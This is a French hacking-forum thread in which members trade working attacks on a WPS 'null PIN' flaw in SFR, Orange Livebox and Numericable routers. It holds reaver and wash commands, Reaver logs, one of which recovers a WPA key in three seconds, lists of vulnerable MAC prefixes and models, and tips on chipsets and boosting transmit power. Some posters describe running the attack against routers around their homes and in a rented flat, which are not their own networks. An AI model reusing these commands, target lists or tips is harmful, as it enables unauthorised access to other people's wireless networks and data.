Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#101 12-08-2017 19:48:03

Martinis1
N00b
Inscription : 12-08-2017
Messages : 2

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Bonjour a tous.
Un grand bravo à toi tout d'abord @kcdtv !

Je suis actuellement en Espagne et je voulais justement tester sur la box dans mon appartement.
Voici ce que j'obtiens au mieux :

Reaver v1.6.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 84:9C:A6:XX:XX:XX
[+] Associated with 84:9C:A6:XX:XX:XX (ESSID: VodafoneA5BC)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""
[!] WARNING: Failed to associate with 84:9C:A6:XX:XX:XX (ESSID: VodafoneA5BC)
[+] Sending EAPOL START request
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""

et ainsi de suite jamais de M3...

Je suis sur une petite TL-WN722N.
Une idée ?
Merci a vous tous pour votre grande communauté et votre partage de savoir wink !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#102 12-08-2017 19:48:11

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 493

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Hug! big_smile
Voici le thème pour les questions installation et usage du script: Boxon.sh: Script faille box PIN WPS "null"
Notez que c'est forcément plus long qu'un scan régulier avec wash. Il faut pouvoir obtenir une réponse probe complète pour connaitre le modèle. Laissez tourner quelques minutes si votre PA n’apparaît pas.

@
Les routeurs vodafone d'Espagne ne sont pas affectés par cette brèche
Ceux de jazztel si: http://www.crack-wifi.com/forum/topic-1 … -null.html
PS: Si tu veux t'informer sur le wifi en Espagne ça se passe ici: https://www.wifi-libre.com/

Dernière modification par kcdtv (12-08-2017 19:54:05)

Hors Ligne

#103 12-08-2017 20:11:56

Martinis1
N00b
Inscription : 12-08-2017
Messages : 2

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Super merci beaucoup smile !

Donc dès que je passe pas le M2 de manière general dans reaver c'est que ce n'est pas sensible au attaques wps ? ( également pixie dust ; bruteforce ; ect... ?)

Ou c'est l'erreur 0x03 ; 0x02  qui le determine ?

(ou les deux ^^ ?)

Hors Ligne

#104 12-08-2017 20:18:40

Torkish
N00b
Inscription : 12-08-2017
Messages : 3

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

j'ai le meme message d'erreur que Martinis1, pourtant ma box est répertoriée

Hors Ligne

#105 12-08-2017 20:24:39

xhark
Membre
Inscription : 28-09-2010
Messages : 16

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Chez Numericable le routeur CastleNet cbv38z4 est touché aussi pour info (https://assistance.numericable.fr/Signi … V38Z4.html)

@kcdtv : peux-tu ajouter le type de box dans une colonne ? genre "Livebox 3" Tu as une erreur "$whute" "au lieu de "$white" dans le script également. Aussi tu dois modifier le "cut -c 11" à "cut -c 12" pour ne pas tronquer le nom des LVBX

Dernière modification par xhark (12-08-2017 21:00:01)

Hors Ligne

#106 12-08-2017 23:35:39

kaz
Membre
Inscription : 12-08-2017
Messages : 13

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

La méthode fonctionne sur de très nombreuses box livebox et neuf/sfr autour de chez moi.
Je voudrais vous indiquer plus de précisions sur les box mais l'option -j de wash n'est pas acceptée chez moi.
Je suis bien en 1.6.1.
Par contre j'utilise Parrot Security.

Hors Ligne

#107 13-08-2017 02:18:52

poyeland
N00b
Inscription : 13-08-2017
Messages : 1

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

bonjour, avec ce genre d'attaque est ce possible de faire semblant qu'on appuie pendant 5 seconde sur le bouton WPS pour l'auth admin ? ^^

Hors Ligne

#108 13-08-2017 06:45:55

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 579

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

poyeland a écrit :

bonjour, avec ce genre d'attaque est ce possible de faire semblant qu'on appuie pendant 5 seconde sur le bouton WPS pour l'auth admin ? ^^

J'aime l'idée big_smile... mais je pense pas non vue que le PIN est natif du WPS et que le bouton WPS/PBC est surtout lié au hardware et bon vouloir du frabriquant.Pour stimuler un wps pbc il faut une intervention de l'utilisateur.

Hors Ligne

#109 13-08-2017 10:21:12

GreyBird
Membre Radioactif
Inscription : 06-09-2015
Messages : 67

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

kaz a écrit :

La méthode fonctionne sur de très nombreuses box livebox et neuf/sfr autour de chez moi.
Je voudrais vous indiquer plus de précisions sur les box mais l'option -j de wash n'est pas acceptée chez moi.
Je suis bien en 1.6.1.
Par contre j'utilise Parrot Security.

Je viens de tester sous Parrot OS,

wash -i wlanXmon -j 

me renvoie bien quelque chose
Tu es sûr d'avoir la version 1.6.1 pour Wash ?


@koala

Pour cette histoire de Awus 036H avec la MAC bizarre, j'ai regardé un peu avec Wireshark
J'ai un .cap avec mon chipset (lorsque l'attaque aboutti). J'ai tenté de comparer mais j'ai rien vu de spécial, j'ai peut être pas les bons yeux !

Par contre, avec l'Alpha,

reaver -i wlan1mon -vv -p "" -t 10 -T 10 -b XX:XX:XX:XX:XX:XX -c 1 -N 

me retourne ça

[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 54 seconds
[+] WPS PIN: ''
[*] String pin was specified, nothing to save.

Marrant non ? roll
L'attaque est bien plus longue
J'ai remarqué également que l'association avec l'AP est bien plus difficile qu'avec le chipset de mon portable

Je continue de creuser, je vais bien tomber sur quelque chose wink

EDIT

L'AP me donne la clef WPA mais c'est hyper aléatoire, peut-être 3 fois sur 10

Dernière modification par GreyBird (13-08-2017 10:27:00)

Hors Ligne

#110 13-08-2017 11:13:05

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 493

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Greybird a écrit :

Tu es sûr d'avoir la version 1.6.1 pour Wash ?

plus_un

Greybird a écrit :

  L'AP me donne la clef WPA mais c'est hyper aléatoire, peut-être 3 fois sur 10

Intéressant ton stdout. Ils ont publiés des stdout similaires sur le forum antichat (PIN vide mais pas la clef)
  J'ai pensé que ces PA étaient invulnérables. L'échange était très sale, plein de message M répétés.
Le gars n'avait pas un chipset affûté pour reaver ou n'était pas dans des conditions correctes.   
Du coup si tu arrives à avoir la clef même si c'est 3 fois sur 10
  Ça veut dire qu'il suffit qu'il soit un peu plus patient et/ou dans de meilleures conditions. 
@ Martinis et @ torkish
  Je me garderais bien de vous assurer quoi que ce soit.
L'ath9k_htc (le driver de votre adaptateur) pose problème avec les derniers kernels (pour reaver)
  Vous pouvez essayer avec une image de kali 1.0 ou Kali 2.0; le chipset devrait aller mieux.
@ xhark
Merci pour ton retour. smile

Dernière modification par kcdtv (13-08-2017 11:15:25)

Hors Ligne

#111 13-08-2017 11:27:39

kaz
Membre
Inscription : 12-08-2017
Messages : 13

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

La version dans Parrot OS est déja la 1.6.1.
J'avais installé aussi la version citée dans le post 1, sans succès.
Aujourd'hui, après un redémarrage et une grosse mise à jour, l'option -j est utilisable, par contre c'est très très long pour avoir les infos, c'est normal ?

J'ai aussi l'impression que la grosse mise à jour à mis le bazar dans parrot, je n'ai plus le centre de notification, plus les gestion des fenêtres, les icones de fermeture...Mais ça c'est une autre histoire.

Hors Ligne

#112 13-08-2017 11:50:29

GreyBird
Membre Radioactif
Inscription : 06-09-2015
Messages : 67

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

kaz a écrit :

l'option -j est utilisable, par contre c'est très très long pour avoir les infos, c'est normal ?

Oui c'est un peu plus long, pas mal de données à traiter par Wash

Hors Ligne

#113 13-08-2017 11:51:29

Efferus
N00b
Inscription : 13-08-2017
Messages : 2

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

J'ajoute 2 modèles de Livebox à la liste

sfr:     vendors:
24:95:04 SFR
00:17:33 SFR
E0-A1-D7 SFR
00-1D-16 SFR
30-7E-CB SFR
00-25-15 SFR
44-CE-7D SFR

Livebox:

18:62:2C Sagemcom Broadband SAS
40:C7:29 Sagemcom Broadband SAS
D0:84:B0 Sagemcom Broadband SAS
F0:82:61 Sagemcom Broadband SAS
2C:39:96 Sagemcom Broadband SAS
00:37:B7 Sagemcom Broadband SAS
34:8A:AE Sagemcom Broadband SAS
40:F2:01 Sagemcom Broadband SAS
A0:8E:78 SagemcomFast3965_LB2.8
B8:26:6C SagemcomFast3965_LB2.8
30:7C:B2 ANOV FRANCE


Numéricable:
74:44:01 NETGEAR

Avec ajout des Livebox 34:8A:AE et 40:F2:01

Dernière modification par Efferus (13-08-2017 11:58:47)

Hors Ligne

#114 13-08-2017 13:12:40

GreyBird
Membre Radioactif
Inscription : 06-09-2015
Messages : 67

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

kcdtv a écrit :

Intéressant ton stdout. Ils ont publiés des stdout similaires sur le forum antichat (PIN vide mais pas la clef)
  J'ai pensé que ces PA étaient invulnérables. L'échange était très sale, plein de message M répétés.
Le gars n'avait pas un chipset affûté pour reaver ou n'était pas dans des conditions correctes.   
Du coup si tu arrives à avoir la clef même si c'est 3 fois sur 10
  Ça veut dire qu'il suffit qu'il soit un peu plus patient et/ou dans de meilleures conditions.

Oui j'ai eu des terminal entier de M1 M2 M3...l'attaque avait fini par aboutir mais c'était très laid comme retour de Reaver

J'ai essayer plein de paramètres différents en jouant à l'apprenti sorcier...mais peu de résultat
Le mieux du mieux ça a été de mettre le paramètre -N et d'espérer obtenir la clef WPA sans avoir un retour vide

Hors Ligne

#115 13-08-2017 15:31:18

kaz
Membre
Inscription : 12-08-2017
Messages : 13

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Voila pour moi

SFR_XXXX      (30:7E:CB) "wps_model_name" : "NB6V-SER-r0"             "wps_device_name" : "SFR_XXXX"
NEUF_XXXX     (00:25:15) "wps_model_name" : "NB4-SER-r2"              "wps_device_name" : "NEUF_XXXX"
NEUF_XXXX     (00:25:15) "wps_model_name" : "NB4-FXC-r2"              "wps_device_name" : "NEUF_XXXX"
Livebox-XXXX  (A4:08:F5) "wps_model_name" : "SagemcomFast3965_LB2.8"
Livebox-XXXX  (54:64:D9) "wps_model_name" : "SagemcomFast3965_LB2.8"
Livebox-XXXX  (30:7C:B2) "wps_model_name" : "SagemcomFast3965_LB2.8"

Hors Ligne

#116 13-08-2017 16:45:35

defvs
N00b
Inscription : 13-08-2017
Messages : 2

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Salut !
Alors voila une box non compatible pour moi. Box ZTE de Orange, type B8:26:6C
Plus ici (je n'utilise pas Windows pour crack vous inquiétez pas, just que j'ai voulu poster en vitesse) https://image.noelshack.com/fichiers/20 … -titre.png

Hors Ligne

#117 13-08-2017 17:04:37

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 579

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Et Orange qui nous sort que c'est très limité... ça commence a faire beaucoup de livebox la cool

Hors Ligne

#118 13-08-2017 17:11:52

kaz
Membre
Inscription : 12-08-2017
Messages : 13

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Je confirme, la Livebox FTTH v2 n'a pas craqué ainsi que la SagemcomFast5360_MIB4

Hors Ligne

#119 13-08-2017 17:38:48

tiboo86
N00b
Inscription : 13-08-2017
Messages : 3

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Pour moi, les livebox en A0:8E:78 SagemcomFast3965_LB2.8 ça ne fonctionne pas dessus.

Ou alors, dixit Orange, le correctif est passé mais bizzare car j'ai testé avant hier.

Reaver v1.6.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from A0:8E:78:1D:B7:44
[+] Associated with A0:8E:78:1D:B7:44 (ESSID: Livebox-B744)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""
^C
[*] String pin was specified, nothing to save.

Hors Ligne

#120 13-08-2017 19:12:57

kaz
Membre
Inscription : 12-08-2017
Messages : 13

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Tu es sur que le WPS est pas locké, ou alors tu es trop éloigné?

Dernière modification par kaz (13-08-2017 19:13:55)

Hors Ligne

#121 13-08-2017 19:55:40

defvs
N00b
Inscription : 13-08-2017
Messages : 2

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

@tiboo86 envoie un

wash -i wlanXmon

pour voir ? Aussi quel chipset ?

Hors Ligne

#122 13-08-2017 20:00:13

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 493

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Ou alors, dixit Orange, le correctif est passé mais bizzare car j'ai testé avant hier.

J'en doute. smile
j'ai fais un update du script: Boxon.sh v 1.0.1
Après il y a un modèle de livebox que je ne peux pas introduire parce que il me faut tous les paramètres qui sortent avec wash.
Et balancez aussi les probes des livebox non vulnérables tant qu'à y être, comme ça on mettra vulnérable ou non vulnérable quand c'est une certitude.
tous les paramètres wps qui sortent sur le PA avec wash -j.
à plus

Dernière modification par kcdtv (13-08-2017 20:01:33)

Hors Ligne

#123 13-08-2017 20:27:17

tiboo86
N00b
Inscription : 13-08-2017
Messages : 3

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

C'est bon en faite, après plusieurs tentative la clé wpa est là smile
Je me suis aidé de aireplay pour faire l'association à l'AP et c'est tout good.

Je pense aussi que la distance joue pour beaucoup, avec un chipset RT2870 j'ai modifié le txpower, "pas une mince affaire....crda et wireless-reg à changer mais après avoir passer le txpower à 30, j'ai résolu mon "Failed associate .Etc"

Cette MAC est donc bien vulnérable big_smile enjoy !

Hors Ligne

#124 13-08-2017 20:29:36

tiboo86
N00b
Inscription : 13-08-2017
Messages : 3

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

defvs a écrit :

@tiboo86 envoie un

wash -i wlanXmon

pour voir ? Aussi quel chipset ?

A0:8E:78:1D:B7:44   1  -45  1.0  No   Livebox-B744

C'est ce que tu voulais ?

Hors Ligne

#125 13-08-2017 20:54:44

disquette
Membre Indétronable
Inscription : 26-12-2015
Messages : 177

Re : 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Très efficace smile

Copyleft (C) 2017 kcdtv @ www.crack-wifi.com
[email protected]:~/boxon# reaver -i wlan1mon -b 24:95:04:xx:xx:xx-p "" -vv -c 1

Reaver v1.6.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 24:95:04:xx:xx:xx
[+] Associated with 24:95:04:xx:xx:xx (ESSID: SFR_xxxx)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: ''
[+] WPA PSK: 'xxxxxxxxxxxxxxxxxxx'
[+] AP SSID: 'SFR_x'
[*] String pin was specified, nothing to save.

Dernière modification par disquette (13-08-2017 20:57:27)


Kali Rolling 4.12.0-kali2-amd64 #1 SMP Debian 4.12.13-1kali2 (2017-10-03) x86_64 GNU/Linux
Alfa AWUS036ACH / Alfa AWUS036H / Alfa AWUS036NH
baia5Ec2D4JPswHFDhl9nA.png

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]